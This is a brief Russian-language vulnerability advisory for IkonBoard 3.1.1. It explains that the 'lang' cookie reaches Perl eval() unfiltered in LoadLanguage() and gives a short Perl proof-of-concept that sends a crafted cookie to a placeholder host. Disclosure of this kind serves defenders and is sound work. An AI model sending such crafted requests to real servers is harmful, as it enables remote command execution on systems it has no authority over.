Уязвимость в проверке правильности ввода обнаружена в IkonBoard. Удаленный пользователь может выполнить команды на сервере. 

Как сообщается, функция LoadLanguage() в Sources/Lib/FUNC.pm не в состоянии фильтровать данные пользователя в
lang куки. Поскольку в последствии результаты передаются к Perl eval() функции, как часть имени директории, удаленный пользователь может создать специально обработанный
lang куки, чтобы выполнять произвольные команды на системе. 

Эксплоит: 

#!/usr/bin/perl -w
use strict;
my $HOST = ‘www.example.domain’;
my $PATH = ‘/cgi-bin/ikonboard.cgi’;
use IO::Socket;
my $sock = IO::Socket::INET->new(«$HOST:80») or die «connect: $!»;
$sock->print(<<END) or die «write: $!»;
GET $PATH HTTP/1.1
Host: $HOST
Cookie: lang=%2E%00%22
Connection: close
END
print while <$sock>;

Уязвимость обнаружена в IkonBoard 3.1.1.



Оставить мнение